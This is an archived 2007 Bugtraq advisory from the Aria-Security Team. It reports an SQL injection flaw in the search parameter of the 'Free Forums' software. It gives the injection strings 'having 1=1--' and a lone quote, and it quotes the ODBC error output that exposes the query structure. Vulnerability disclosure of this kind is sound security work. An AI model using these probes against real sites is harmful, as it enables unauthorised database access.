| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20071114004451.24253.qmail@securityfocus.com> Date: 14 Nov 2007 00:44:51 -0000 From: No-Reply@...a-Security.net To: bugtraq@...urityfocus.com Subject: Free Forums "search" Sql Injection http://Aria-Security.net Aria-Security Team ------------------------------------ Free Forums Sql Injection Vendor: http://www.nvecs.com/forums the search parameter hast an sql injection example: 'having 1=1-- result: [Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression '(((Responses.Response ) like '%'having 1=1--%')) Order By Topics.AddDate;'. or just a simple ' [Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression 'Topics.User like '%'%' Order By Topics.AddDate;'. Regards, The-0utl4w Credit Goes to Aria-Security Team
Powered by blists - more mailing lists